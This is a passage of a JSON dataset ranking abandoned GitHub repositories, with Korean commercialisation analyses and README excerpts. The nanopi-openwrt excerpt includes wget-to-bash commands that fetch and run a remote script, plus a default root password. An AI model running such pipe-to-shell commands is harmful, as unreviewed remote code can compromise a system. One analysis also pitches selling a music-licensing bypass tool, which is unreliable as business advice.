fun","composite_score":0.6083,"license_safety_tag":"safe"},{"name":"testing-library/vue-testing-library","github_url":"https://github.com/testing-library/vue-testing-library","stars":7,"language":"JavaScript","license":"MIT","abandonment_months":24,"description":"# vue-testing-library 분석 보고서\n\n## 왜 보물인가\n웹사이트나 앱이 제대로 작동하는지 자동으로 점검해주는 도구로, 개발자들이 버그를 빠르게 찾고 수정할 수 있게 돕습니다.\n\n## 어디에 쓸 수 있나\n\n**1. SaaS 서비스: 웹 애플리케이션 품질 보증 플랫폼**\n기업들이 만드는 웹서비스의 안정성을 자동으로 검사하는 구독형 서비스로 운영","readme_excerpt":"<div align=\"center\">\n<h1>Vue Testing Library</h1>\n\n<br />\n\n<a href=\"https://www.joypixels.com/emoji/1F98E\">\n  <img\n    height=\"80\"\n    width=\"80\"\n    alt=\"lizard\"\n    src=\"https://raw.githubusercontent.com/testing-library/vue-testing-library/main/lizard.png\"\n  />\n</a>\n\n<p>Simple and complete Vue.js testing utilities that encourage good testing practices.</p>\n\n<p>Vue Testing Library is a lightweight adapter built on top of <a href=\"https://github.com/testing-library/dom-testing-library/\">DOM Testing Library</a> and <a href=\"https://github.com/vuejs/vue-test-utils\">@vue/test-utils</a>.</p>\n\n<br />\n\n[**Read the docs**][docs] | [Edit the docs][docs-edit]\n\n<br />\n\n</div>\n\n<hr />\n\n<!-- prettier-ignore-start -->\n[![Coverage Status][coverage-badge]][coverage]\n[![GitHub version][github-badge]][github]\n[![npm version][npm-badge]][npm]\n[![Discord][discord-badge]][discord]\n[![MIT License][license-badge]][license]\n<!-- prettier-ignore-end -->\n\n<h2>Table of Contents</h2>\n\n<!-- START doctoc generated","composite_score":0.6072,"license_safety_tag":"safe"},{"name":"npryce/adr-tools","github_url":"https://github.com/npryce/adr-tools","stars":5,"language":"Shell","license":"NOASSERTION","abandonment_months":25,"description":"# adr-tools 상용화 분석\n\n## 왜 보물인가\n회사의 주요 기술 결정 사항을 체계적으로 기록하고 관리함으로써 팀 간 혼란을 줄이고 의사결정 속도를 높일 수 있는 도구입니다.\n\n## 어디에 쓸 수 있나\n\n1. **SaaS 서비스**: 스타트업·개발팀이 구독하는 온라인 의사결정 기록 플랫폼 (GitHub 같은 협업 도구와 연동)\n2. **내부 업무 도구","readme_excerpt":"ADR Tools\n=========\n\nA command-line tool for working with a log of [Architecture Decision Records][ADRs] (ADRs).\n\n[![Build Status](https://travis-ci.org/npryce/adr-tools.svg?branch=master)](https://travis-ci.org/npryce/adr-tools)\n\nQuick Start\n-----------\n\n[Install ADR Tools](INSTALL.md).\n\nUse the `adr` command to manage ADRs.  Try running `adr help`.\n\nADRs are stored in a subdirectory of your project as Markdown files. \nThe default directory is `doc/adr`, but you can specify the directory\nwhen you initialise the ADR log.\n\n1. Create an ADR directory in the root of your project:\n\n        adr init doc/architecture/decisions\n\n    This will create a directory named `doc/architecture/decisions` \n    containing the first ADR, which records that you are using ADRs\n    to record architectural decisions and links to \n    [Michael Nygard's article on the subject][ADRs].\n\n2. Create Architecture Decision Records\n\n        adr new Implement as Unix shell scripts\n\n    This will create a new, numbered ","composite_score":0.6068,"license_safety_tag":"unknown"},{"name":"nuysoft/Mock","github_url":"https://github.com/nuysoft/Mock","stars":7,"language":"JavaScript","license":"mit","abandonment_months":27,"description":"# Mock 저장소 분석\n\n## 왜 보물인가\n소프트웨어 개발 시 실제 데이터 없이도 테스트할 수 있게 해주는 도구로, 개발 속도를 크게 높일 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n1. **SaaS 개발 회사의 내부 도구**: 신입 개발자들이 실제 고객 데이터 없이 빠르게 기능을 테스트하고 학습할 수 있는 환경 제공\n2. **API 판매 기업의 테스트 ","readme_excerpt":"# Mock.js\n<!-- 模拟请求 & 模拟数据 -->\n[![Build Status](https://travis-ci.org/nuysoft/Mock.svg?branch=refactoring)](https://travis-ci.org/nuysoft/Mock)\n\n<!-- [![Coverage Status](https://coveralls.io/repos/nuysoft/Mock/badge.png?branch=refactoring)](https://coveralls.io/r/nuysoft/Mock?branch=refactoring)\n[![NPM version](https://badge.fury.io/js/mockjs.svg)](http://badge.fury.io/js/mockjs)\n[![Bower version](https://badge.fury.io/bo/mockjs.svg)](http://badge.fury.io/bo/mockjs)\n[![Dependency Status](https://gemnasium.com/nuysoft/Mock.svg)](https://gemnasium.com/nuysoft/Mock)\n[![spm package](http://spmjs.io/badge/mockjs)](http://spmjs.io/package/mockjs) -->\n\nMock.js is a simulation data generator to help the front-end to develop and prototype separate from the back-end progress and reduce some monotony particularly while writing automated tests.\n\nThe official site: <http://mockjs.com>\n\n## Features\n\n* Generate simulated data according to the data template\n* Provide request/response mocking for ajax ","composite_score":0.6059,"license_safety_tag":"safe"},{"name":"klever1988/nanopi-openwrt","github_url":"https://github.com/klever1988/nanopi-openwrt","stars":9,"language":"Shell","license":"unknown","abandonment_months":26,"description":"# nanopi-openwrt 저장소 분석\n\n## 왜 보물인가\n저렴한 소형 컴퓨터를 공유기 같은 네트워크 기기로 만들 수 있는 오픈소스 프로젝트로, 개인이나 소규모 기업이 비용을 크게 절감할 수 있습니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 홈/사무실 네트워크 관리 클라우드 플랫폼 (구독형 모니터링/보안 서비스)\n- **내부 업무 도구*","readme_excerpt":"# Nanopi R1S R2S R2C R4S X86 Openwrt 固件\n\n[刷机工具](https://www.balena.io/etcher/)  \n[下载地址](#下载地址)  \n[更新说明](#更新说明)  \n[使用提示](#使用提示)  \n[固件特性](#固件特性)  \n[在线升级](#终端内在线升级方法)  \n[1分钟生成自己所需固件](#1分钟生成自己所需固件)  \n\n### 下载地址：\nhttps://github.com/stupidloud/nanopi-openwrt/tags  \n(img.gz档不需要解压，可以直接使用刷机工具刷入)\n\n### 使用提示：\n默认用户名是root, 密码是password，局域网IP为192.168.2.1  \n烧制完固件插入tf卡并启动完成，电脑端显示“网络（已连接）”之后，在浏览器输入 http://immortalwrt/ 可以直接打开路由器后台，无需修改本地连接设置或者查看IP地址。  \n如果网络状态一直是未识别（上电超过5分钟），请直接插拔一次电源重启试试。\n\n### 终端内在线升级方法：\n```bash\nwget -qO- https://github.com/stupidloud/nanopi-openwrt/raw/master/scripts/autoupdate-bash.sh | bash\n```\nslim版\n```bash\nwget -qO- https://github.com/stupidloud/nanopi-openwrt/raw/master/scripts/autoupdate-bash.sh | ver=-slim bash\n```\nx86安装盘不是sda的情况下使用\n```bash\nwget -qO- https://github.com/klever1988/nanopi-openwrt/raw/master/scripts/autoupdate-bash.sh | disk=sdb bash\n```\n(脚本由gary lau提供，非常感谢！)\n\n### 固件特性：\n- slim版固件只有OpenWrt本体，但内置了“本地软件源”，包含大部分常用插件，不喜欢固件预装繁杂插件的人可以选择这个版本，进入后台软件包选装所需插件\n- 采用ext4文件系统，刷卡之后可自行","composite_score":0.6053,"license_safety_tag":"unknown"},{"name":"MysteryVaibhav/leetcode_company_wise_questions","github_url":"https://github.com/MysteryVaibhav/leetcode_company_wise_questions","stars":15,"language":"","license":"unknown","abandonment_months":51,"description":"# MysteryVaibhav/leetcode_company_wise_questions 평가\n\n## 왜 보물인가\n기업별 코딩 면접 기출문제를 체계적으로 정리해놓아 취업 준비생들이 각 회사의 출제 패턴을 미리 파악하고 맞춤 공부를 할 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **면접 준비 SaaS**: 기업별 기출문제 데이터베이스를 기반으로 AI가 맞춤","readme_excerpt":"# leetcode_company_wise_questions\nThis is a repository containing the list of company wise questions available on leetcode premium.\n\nEvery pdf file in this repository corresponds to a list of questions on leetcode for a specific company based on the _leetcode company tags_. The list of questions within each pdf is further sorted by their frequency, so the most popular question for a specific company is at the top.\n","composite_score":0.6051,"license_safety_tag":"unknown"},{"name":"facebook/draft-js","github_url":"https://github.com/facebook/draft-js","stars":8,"language":"JavaScript","license":"mit","abandonment_months":40,"description":"# Facebook Draft-JS 상용화 분석\n\n## 왜 보물인가\n페이스북이 만든 글쓰기 편집 도구로, 워드프로세서처럼 서식을 적용하고 편집할 수 있는 기능을 웹사이트에 쉽게 추가할 수 있습니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 노션이나 구글 문서처럼 기능하는 협업 문서 작성 플랫폼\n- **내부 업무 도구**: 회사 내부 뉴스레터,","readme_excerpt":"<p align=\"center\">\n  <a href=\"http://draftjs.org/\">\n    <img src=\"https://draftjs.org/img/draftjs-logo.svg\" alt=\"draftjs-logo\" width=\"8%\" />\n  </a>\n</p>\n<h1 align=\"center\">\n  Draft.js\n</h1>\n<p align=\"center\">\n  <a href=\"https://travis-ci.org/facebook/draft-js\">\n    <img src=\"https://img.shields.io/travis/facebook/draft-js/master.svg?style=flat\" alt=\"Build Status\" />\n  </a>\n  <a href=\"https://yarn.pm/draft-js\">\n    <img src=\"https://img.shields.io/npm/v/draft-js.svg?style=flat\" alt=\"npm version\" />\n  </a>\n</p>\n<p align=\"center\">\n  <img src=\"https://media.giphy.com/media/XHUjaxELpc11SiRSqN/giphy.gif\" alt=\"Live Demo\" />\n</p>\n\n--------------------\n## Status\n\n**THIS PROJECT IS CURRENTLY IN MAINTENANCE MODE. It will not receive any feature updates, only critical security bug patches. On 31st December 2022 the repo will be fully archived.**\n\nFor users looking for an open source alternative, Meta have been working on migrating to a new framework, called [Lexical](https://github.com/facebook/le","composite_score":0.6043,"license_safety_tag":"safe"},{"name":"Alro10/deep-learning-time-series","github_url":"https://github.com/Alro10/deep-learning-time-series","stars":10,"language":"Jupyter Notebook","license":"Apache-2.0","abandonment_months":27,"description":"# Alro10/deep-learning-time-series 상용화 분석\n\n## 왜 보물인가\n과거 데이터 패턴을 학습해서 미래를 예측하는 기술로, 주가·판매량·날씨 예보 같은 시계열 데이터 분석이 필요한 모든 비즈니스에서 수익 창출이 가능합니다.\n\n## 어디에 쓸 수 있나\n\n**1. SaaS 서비스 - 중소 소매점 매출 예측 플랫폼**\n재고 관리와 인력 ","readme_excerpt":"# Deep Learning Time Series Forecasting\n[![PRsWelcome](https://img.shields.io/badge/PRs-welcome-brightgreen.svg?style=flat-square)](http://makeapullrequest.com)\n\n\nList of state of the art papers focus on deep learning and resources, code and experiments using deep learning for time series forecasting. Classic methods vs Deep Learning methods, Competitions...\n\n## [Table of Contents]()\n\n* [Papers](#Papers)\n* [Conferences](#Conferences)\n* [Competitions](#Competitions)\n* [Code](#Code)\n* [Theory-Resource](#Theory-Resource)\n* [Code Resource](#Code-Resource)\n* [Datasets](#Datasets)\n\n\n## Papers\n\n### 2021\n\n- [Autoformer: Decomposition Transformers with Auto-Correlation for Long-Term Series Forecasting](https://arxiv.org/abs/2106.13008)\n\n  - Haixu Wu, et al.\n  - [[Code](https://github.com/thuml/Autoformer)]\n\n- [Long Range Probabilistic Forecasting in Time-Series using High Order Statistics](https://arxiv.org/pdf/2111.03394.pdf)\n\n  - Prathamesh Deshpande, et al.\n  - \\[[Code](https://github.com/pr","composite_score":0.6029,"license_safety_tag":"safe"},{"name":"answershuto/learnVue","github_url":"https://github.com/answershuto/learnVue","stars":7,"language":"JavaScript","license":"unknown","abandonment_months":40,"description":"# answershuto/learnVue 분석\n\n## 왜 보물인가\nVue라는 인기 있는 웹 개발 프레임워크를 배우기 위한 실습 자료 모음으로, 초보자 친화적인 학습 콘텐츠로 교육 수요를 충족할 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **온라인 교육 플랫폼**: 프로그래밍 초보자 대상 Vue 강의 콘텐츠로 제공하여 월 구독료 수익화\n2. **기업 직원","readme_excerpt":"# learnVue\n\n## 介绍\n\nVue.js源码分析，记录了个人学习Vue.js源码的过程中的一些心得以及收获。以及对于Vue框架，周边库的一些个人见解。\n\n在学习的过程中我为Vue.js（2.3.0）、Vuex（2.4.0）、Vue-router（3.0.1）加上了注释，分别在文件夹[vue-src](./vue-src)、[vuex-src](./vuex-src)以及[vue-router-src](./vue-router-src)中，希望可以帮助有需要的同学更好地学习理解Vue.js及周边库的源码。\n\n感谢[尤大](https://github.com/yyx990803)提高生产力。\n\n本项目希望对Vue.js做更进一步的探索与学习，Vue.js基础内容请参考Vue.js官网，[https://cn.vuejs.org/v2/guide/](https://cn.vuejs.org/v2/guide/)。\n可能会有理解存在偏差的地方，欢迎提issue指出，共同学习，共同进步。\n\n---\n\n## 目录\n\n### 源码相关\n\n[Vue.js响应式原理](./docs/响应式原理.MarkDown)\n\n[Vue.js依赖收集](./docs/依赖收集.MarkDown)\n\n[从Vue.js源码角度再看数据绑定](./docs/从源码角度再看数据绑定.MarkDown)\n\n[Vue.js事件机制](./docs/Vue事件机制.MarkDown)\n\n[VNode节点(Vue.js实现)](./docs/VNode节点.MarkDown)\n\n[Virtual DOM与diff(Vue.js实现)](./docs/VirtualDOM与diff(Vue实现).MarkDown)\n\n[聊聊Vue.js的template编译](./docs/聊聊Vue的template编译.MarkDown)\n\n[Vue.js异步更新DOM策略及nextTick](./docs/Vue.js异步更新DOM策略及nextTick.MarkDown)\n\n[从template到DOM（Vue.js源码角度看内部运行机制）](./docs/从template到DOM(Vue.js源码角度看内部运行机制).MarkDown)\n\n[Vuex源码解析](./docs/Vuex源码解析.Mark","composite_score":0.6018,"license_safety_tag":"unknown"},{"name":"MetinSeylan/Vue-Socket.io","github_url":"https://github.com/MetinSeylan/Vue-Socket.io","stars":5,"language":"JavaScript","license":"MIT","abandonment_months":40,"description":"# Vue-Socket.io 분석 보고서\n\n## 왜 보물인가\n웹 애플리케이션에서 실시간 양방향 통신을 간단하게 구현할 수 있게 해주는 도구로, 채팅, 알림, 라이브 업데이트가 필요한 모든 서비스에 필수적입니다.\n\n## 어디에 쓸 수 있나\n1. **실시간 협업 도구**: 여러 사용자가 동시에 문서를 편집하고 즉시 변화가 반영되는 온라인 화이트보드 또는 프로젝","readme_excerpt":"<p align=\"center\">\n    <a href=\"https://github.com/MetinSeylan/Vue-Socket.io\" target=\"_blank\">\n    <img width=\"250\" src=\"https://raw.githubusercontent.com/MetinSeylan/Vue-Socket.io/master/docs/logo.png\">\n    </a>\n</p> \n\n<p align=\"center\">\n  <a href=\"https://www.npmjs.com/package/vue-socket.io\"><img src=\"https://img.shields.io/npm/v/vue-socket.io.svg\"/> <img src=\"https://img.shields.io/npm/dt/vue-socket.io.svg\"/></a>\n  <a href=\"https://github.com/vuejs/awesome-vue\"><img src=\"https://cdn.rawgit.com/sindresorhus/awesome/d7305f38d29fed78fa85652e3a63e154dd8e8829/media/badge.svg\"/></a>\n  <a href=\"https://vuejs.org/\"><img src=\"https://img.shields.io/badge/vue-2.x-brightgreen.svg\"/></a>\n  <a href=\"http://packagequality.com/#?package=vue-socket.io\"><img src=\"http://npm.packagequality.com/shield/vue-socket.io.svg\"/></a>\n  <a href=\"https://github.com/MetinSeylan/Vue-Socket.io/\"><img src=\"https://img.shields.io/npm/l/vue-socket.io.svg\"/></a>\n  <a href=\"https://github.com/MetinSeylan/Vue-Socket.io/","composite_score":0.6011,"license_safety_tag":"safe"},{"name":"alievk/avatarify-python","github_url":"https://github.com/alievk/avatarify-python","stars":5,"language":"Python","license":"NOASSERTION","abandonment_months":21,"description":"# Avatarify-Python 분석\n\n## 왜 보물인가\n사진이나 영상만으로 자신의 표정과 움직임을 가진 가상 인물(아바타)을 만들 수 있어, 화상 회의나 영상 제작에 혁신을 가져올 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n1. **SaaS 서비스**: 온라인 교육 플랫폼에서 강사가 실제 얼굴 대신 원하는 캐릭터로 강의할 수 있는 \"AI 튜터 서비스\"\n","readme_excerpt":"![](docs/mona.gif)\n\n# Avatarify Python\n\nPhotorealistic avatars for video-conferencing.\n\nAvatarify Python requires manually downloading and installing some dependencies, and is therefore best suited for users who have some experience with command line applications. [Avatarify Desktop](https://github.com/alievk/avatarify-desktop), which aims to be easier to install and use, is recommended for most users. If you still want to use Avatarify Python, proceed to the [install instructions](docs/).\n\nBased on [First Order Motion Model](https://github.com/AliaksandrSiarohin/first-order-model).\n\n## News\n- **7 Mar 2021.** Renamed project to Avatarify Python to distinguish it from other versions of Avatarify\n- **14 December 2020.** Released Avatarify Desktop. Check it out [here](https://github.com/alievk/avatarify-desktop).\n- **11 July 2020.** Added Docker support. Now you can run Avatarify from Docker on [Linux](https://github.com/alievk/avatarify-python/blob/master/docs/README.md#docker). Thanks t","composite_score":0.6001,"license_safety_tag":"unknown"},{"name":"ianstormtaylor/superstruct","github_url":"https://github.com/ianstormtaylor/superstruct","stars":264,"language":"TypeScript","license":"MIT","abandonment_months":20,"description":"# Superstruct 저장소 분석\n\n## 왜 보물인가\n복잡한 데이터를 검증하는 작업을 간단하게 만들어주는 도구로, 개발자가 오류 없이 안전한 서비스를 빠르게 만들 수 있게 돕습니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 사용자가 입력한 정보가 올바른 형식인지 자동으로 확인하는 회원가입·결제 시스템\n2. **내부 업무 도구**: 기업이","readme_excerpt":"<p align=\"center\">\n  <a href=\"#\"><img src=\"./docs/images/banner.png\" /></a>\n</p>\n\n<p align=\"center\">\n  A simple and composable way  <br/>\n  to validate data in JavaScript (and TypeScript).\n</p>\n<br/>\n<br/>\n\n<p align=\"center\">\n  <a href=\"#usage\">Usage</a> •\n  <a href=\"#why\">Why?</a> •\n  <a href=\"#principles\">Principles</a> •\n  <a href=\"#demo\">Demo</a> •\n  <a href=\"#examples\">Examples</a> •\n  <a href=\"#documentation\">Documentation</a>\n</p>\n\n<p align=\"center\">\n  <a href=\"https://unpkg.com/superstruct/umd/superstruct.min.js\">\n    <img src=\"https://badgen.net/bundlephobia/minzip/superstruct?color=green&label=size\" alt=\"\">\n  </a>\n  <a href=\"./package.json\">\n    <img src=\"https://badgen.net/npm/v/superstruct?color=blue&label=version\" alt=\"\">\n  </a>\n  <a href=\"https://jsr.io/@superstruct/core\">\n    <img src=\"https://jsr.io/badges/@superstruct/core\" alt=\"\">\n  </a>\n</p>\n\n<br/>\n<br/>\n\nSuperstruct makes it easy to define interfaces and then validate JavaScript data against them. Its type annotatio","composite_score":0.5996,"license_safety_tag":"safe"},{"name":"orcaman/concurrent-map","github_url":"https://github.com/orcaman/concurrent-map","stars":7,"language":"Go","license":"mit","abandonment_months":24,"description":"# Concurrent-Map 사업화 분석\n\n## 왜 보물인가\n여러 사용자가 동시에 접근해도 안전하게 데이터를 관리하는 기술로, 빠르고 안정적인 온라인 서비스 구축의 핵심 기반입니다.\n\n## 어디에 쓸 수 있나\n- **실시간 협업 도구 SaaS**: 여러 사용자가 동시에 같은 문서를 편집할 때 데이터 충돌 방지\n- **금융 거래 API**: 동시다발적인 주","readme_excerpt":"# concurrent map [![Build Status](https://travis-ci.com/orcaman/concurrent-map.svg?branch=master)](https://travis-ci.com/orcaman/concurrent-map)\n\nAs explained [here](http://golang.org/doc/faq#atomic_maps) and [here](http://blog.golang.org/go-maps-in-action), the `map` type in Go doesn't support concurrent reads and writes. `concurrent-map` provides a high-performance solution to this by sharding the map with minimal time spent waiting for locks.\n\nPrior to Go 1.9, there was no concurrent map implementation in the stdlib. In Go 1.9, `sync.Map` was introduced. The new `sync.Map` has a few key differences from this map. The stdlib `sync.Map` is designed for append-only scenarios. So if you want to use the map for something more like in-memory db, you might benefit from using our version. You can read more about it in the golang repo, for example [here](https://github.com/golang/go/issues/21035) and [here](https://stackoverflow.com/questions/11063473/map-with-concurrent-access)\n\n## usage\n\nI","composite_score":0.5996,"license_safety_tag":"safe"},{"name":"ZQPei/deep_sort_pytorch","github_url":"https://github.com/ZQPei/deep_sort_pytorch","stars":5,"language":"Python","license":"MIT","abandonment_months":23,"description":"# Deep Sort PyTorch 저장소 분석\n\n## 왜 보물인가\n영상에서 사람이나 물체를 자동으로 추적하는 기술로, 보안 카메라, 스포츠 중계, 자율주행차 등 실생활 곳곳에서 필요한 핵심 기술입니다.\n\n## 어디에 쓸 수 있나\n1. **CCTV 모니터링 SaaS**: 보안 회사에 구현하여 \"알 수 없는 사람이 연속으로 나타났습니다\" 같은 자동 알림 서비","readme_excerpt":"# Deep Sort with PyTorch\n\n![](demo/demo.gif)\n\n## Update(1-1-2020)\nChanges\n- fix bugs\n- refactor code\n- accerate detection by adding nms on gpu\n\n## Update(07-22)\nChanges\n- bug fix (Thanks @JieChen91 and @yingsen1 for bug reporting).  \n- using batch for feature extracting for each frame, which lead to a small speed up.  \n- code improvement.\n\nFuther improvement direction  \n- Train detector on specific dataset rather than the official one.\n- Retrain REID model on pedestrain dataset for better performance.\n- Replace YOLOv3 detector with advanced ones.\n\n## Update(23-05-2024)\n\n### tracking \n\n- Added resnet network to the appearance feature extraction network in the deep folder\n\n- Fixed the NMS bug in the `preprocessing.py` and also fixed covariance calculation bug in the `kalmen_filter.py` in the sort folder\n\n### detecting\n\n- Added YOLOv5 detector, aligned interface, and added YOLOv5 related yaml configuration files. Codes references this repo: [YOLOv5-v6.1](https://github.com/ultralytics/yol","composite_score":0.5996,"license_safety_tag":"safe"},{"name":"facebookresearch/maskrcnn-benchmark","github_url":"https://github.com/facebookresearch/maskrcnn-benchmark","stars":7,"language":"Python","license":"MIT","abandonment_months":40,"description":"# Mask R-CNN Benchmark 상용화 분석\n\n## 왜 보물인가\n페이스북 연구팀이 만든 이 도구는 사진 속 물체를 자동으로 찾아내고 윤곽을 그려주는 기술로, 보안 감시, 의료 영상 분석, 자동 검수 등 실무에서 즉시 활용 가능합니다.\n\n## 어디에 쓸 수 있나\n\n**1. CCTV 기반 이상 탐지 SaaS**\n- 공장·매장 실시간 영상에서 물체 자동","readme_excerpt":"# Faster R-CNN and Mask R-CNN in PyTorch 1.0\n\n**maskrcnn-benchmark has been deprecated. Please see [detectron2](https://github.com/facebookresearch/detectron2), which includes implementations for all models in maskrcnn-benchmark**\n\nThis project aims at providing the necessary building blocks for easily\ncreating detection and segmentation models using PyTorch 1.0.\n\n![alt text](demo/demo_e2e_mask_rcnn_X_101_32x8d_FPN_1x.png \"from http://cocodataset.org/#explore?id=345434\")\n\n## Highlights\n- **PyTorch 1.0:** RPN, Faster R-CNN and Mask R-CNN implementations that matches or exceeds Detectron accuracies\n- **Very fast**: up to **2x** faster than [Detectron](https://github.com/facebookresearch/Detectron) and **30%** faster than [mmdetection](https://github.com/open-mmlab/mmdetection) during training. See [MODEL_ZOO.md](MODEL_ZOO.md) for more details.\n- **Memory efficient:** uses roughly 500MB less GPU memory than mmdetection during training\n- **Multi-GPU training and inference**\n- **Mixed preci","composite_score":0.599,"license_safety_tag":"safe"},{"name":"NVlabs/stylegan2","github_url":"https://github.com/NVlabs/stylegan2","stars":8,"language":"Python","license":"NOASSERTION","abandonment_months":25,"description":"# StyleGAN2 상용화 분석\n\n## 왜 보물인가\n인공지능으로 현실 같은 얼굴이나 이미지를 만들 수 있는 기술로, 엔터테인먼트·광고·게임 등 창의산업에서 엄청난 수요가 있습니다.\n\n## 어디에 쓸 수 있나\n\n**1. 콘텐츠 생성 SaaS**\n- 마케팅 팀이 모델 촬영 없이 광고 이미지를 자동 생성하는 웹 서비스\n- 월 구독료로 월간 생성 이미지 한도 제","readme_excerpt":"## StyleGAN2 &mdash; Official TensorFlow Implementation\n\n![Teaser image](./docs/stylegan2-teaser-1024x256.png)\n\n**Analyzing and Improving the Image Quality of StyleGAN**<br>\nTero Karras, Samuli Laine, Miika Aittala, Janne Hellsten, Jaakko Lehtinen, Timo Aila<br>\n\nPaper: http://arxiv.org/abs/1912.04958<br>\nVideo: https://youtu.be/c-NJtV9Jvp0<br>\n\nAbstract: *The style-based GAN architecture (StyleGAN) yields state-of-the-art results in data-driven unconditional generative image modeling. We expose and analyze several of its characteristic artifacts, and propose changes in both model architecture and training methods to address them. In particular, we redesign generator normalization, revisit progressive growing, and regularize the generator to encourage good conditioning in the mapping from latent vectors to images. In addition to improving image quality, this path length regularizer yields the additional benefit that the generator becomes significantly easier to invert. This makes it po","composite_score":0.5989,"license_safety_tag":"unknown"},{"name":"nondanee/UnblockNeteaseMusic","github_url":"https://github.com/nondanee/UnblockNeteaseMusic","stars":9,"language":"JavaScript","license":"MIT","abandonment_months":36,"description":"# UnblockNeteaseMusic 보물 분석\n\n## 왜 보물인가\n중국의 음악 스트리밍 서비스인 넷이즈 뮤직(NetEase Music)에서 라이센스 문제로 재생되지 않는 노래들을 우회 기술로 재생 가능하게 만드는 솔루션입니다.\n\n## 어디에 쓸 수 있나\n1. **음악 스트리밍 앱 통합 기능**: 넷이즈 뮤직 사용자들을 위한 프리미엄 기능으로 제공되는 구","readme_excerpt":"<img src=\"https://user-images.githubusercontent.com/26399680/47980314-0e3f1700-e102-11e8-8857-e3436ecc8beb.png\" alt=\"logo\" width=\"140\" height=\"140\" align=\"right\">\n\n# UnblockNeteaseMusic\n\n解锁网易云音乐客户端变灰歌曲\n\n## 特性\n\n- 使用 QQ / 虾米 / 百度 / 酷狗 / 酷我 / 咪咕 / JOOX 音源替换变灰歌曲链接 (默认仅启用一、五、六)\n- 为请求增加 `X-Real-IP` 参数解锁海外限制，支持指定网易云服务器 IP，支持设置上游 HTTP / HTTPS 代理\n- 完整的流量代理功能 (HTTP / HTTPS)，可直接作为系统代理 (同时支持 PAC)\n\n## 运行\n\n使用 npx\n\n```\n$ npx @nondanee/unblockneteasemusic\n```\n\n或使用 Docker\n\n```\n$ docker run nondanee/unblockneteasemusic\n```\n\n```\n$ docker-compose up\n```\n\n### 配置参数\n\n```\n$ unblockneteasemusic -h\nusage: unblockneteasemusic [-v] [-p port] [-a address] [-u url] [-f host]\n                           [-o source [source ...]] [-t token] [-e url] [-s]\n                           [-h]\n\noptional arguments:\n  -v, --version                   output the version number\n  -p port, --port port            specify server port\n  -a address, --address address   specify server host\n  -u url, --proxy-url url         request throug","composite_score":0.5988,"license_safety_tag":"safe"},{"name":"bilibili/flv.js","github_url":"https://github.com/bilibili/flv.js","stars":10,"language":"JavaScript","license":"apache-2.0","abandonment_months":23,"description":"# bilibili/flv.js 상용화 분석\n\n## 왜 보물인가\n동영상 플랫폼에서 가장 기본이 되는 영상 재생 기술로, 웹브라우저에서 안정적으로 동영상을 재생하는 핵심 도구입니다.\n\n## 어디에 쓸 수 있나\n\n1. **SaaS 서비스**: 라이브 스트리밍 플랫폼(유튜브, 트위치 같은 개인 방송 서비스)에서 시청자들에게 끊김 없는 영상 제공\n2. **내부 업","readme_excerpt":"\nflv.js  [![npm](https://img.shields.io/npm/v/flv.js.svg?style=flat)](https://www.npmjs.com/package/flv.js)\n======\nAn HTML5 Flash Video (FLV) Player written in pure JavaScript without Flash. LONG LIVE FLV!\n\nThis project relies on [Media Source Extensions][] to work.\n\n**For FLV live stream playback, please consider [mpegts.js][] which is under active development.**\n\n**This project will become rarely maintained.**\n\n[mpegts.js]: https://github.com/xqq/mpegts.js\n## Overview\nflv.js works by transmuxing FLV file stream into ISO BMFF (Fragmented MP4) segments, followed by feeding mp4 segments into an HTML5 `<video>` element through [Media Source Extensions][] API.\n\n[Media Source Extensions]: https://w3c.github.io/media-source/\n\n## Demo\n[http://bilibili.github.io/flv.js/demo/](http://bilibili.github.io/flv.js/demo/)\n\n## Features\n- FLV container with H.264 + AAC / MP3 codec playback\n- Multipart segmented video playback\n- HTTP FLV low latency live stream playback\n- FLV over WebSocket live stream","composite_score":0.5987,"license_safety_tag":"safe"},{"name":"john-smilga/javascript-basic-projects","github_url":"https://github.com/john-smilga/javascript-basic-projects","stars":9,"language":"CSS","license":"unknown","abandonment_months":22,"description":"# JavaScript 기본 프로젝트 저장소 분석\n\n## 왜 보물인가\n웹사이트에 움직임과 상호작용을 넣는 기본 기술들을 실제 프로젝트로 배울 수 있는 교육용 자료 모음입니다.\n\n## 어디에 쓸 수 있나\n1. **온라인 코딩 교육 플랫폼**: 초보자용 자습서 콘텐츠로 구독자를 유입시키고 유료 심화 과정으로 연결\n2. **기업 직원 교육 도구**: 신입 개발자","readme_excerpt":"# Vanilla JS Projects\n\n#### Enroll In The Course\n\n[My Javascript Course](https://www.udemy.com/course/javascript-tutorial-for-beginners-w/?referralCode=DD9FA6C0D976918D3E1C)\n\n#### Support\n\nFind the Content Useful? [You can always buy me a coffee](https://www.buymeacoffee.com/johnsmilga)\n\n## You can see all projects in action here\n\n[Projects](https://www.vanillajavascriptprojects.com/)\n\n1. Color Flipper\n2. Counter\n3. Reviews\n4. Navbar\n5. Sidebar\n6. Modal\n7. Questions\n8. Menu\n9. Video\n10. Scroll\n11. Tabs\n12. Countdown Timer\n13. Lorem Ipsum\n14. Grocery Bud\n15. Slider\n\n#### Course Exclusive\n\n16. Counters (OOP)\n17. Gallery (OOP)\n18. Numbers\n19. Dark Mode\n20. Filters\n21. Dad Jokes\n22. Products\n23. Random User\n24. Cocktails\n25. Slider\n26. Stripe Submenus\n27. Pagination\n28. Wikipedia\n29. Comfy Sloth\n","composite_score":0.5986,"license_safety_tag":"unknown"},{"name":"pandao/editor.md","github_url":"https://github.com/pandao/editor.md","stars":8,"language":"JavaScript","license":"mit","abandonment_months":25,"description":"# editor.md 상용화 분석\n\n## 왜 보물인가\n블로그, 뉴스레터, 협업 문서 작성 시 글을 예쁘게 꾸며주는 온라인 편집기로, 누구나 쉽게 전문적인 콘텐츠를 만들 수 있게 해줍니다.\n\n## 어디에 쓸 수 있나\n\n**1. 블로그 플랫폼 SaaS**\n- 개인 블로거와 미디엄 같은 블로깅 서비스가 기본 편집 도구로 탑재 가능\n- 글쓰기 경험을 크게 개선하여","readme_excerpt":"# 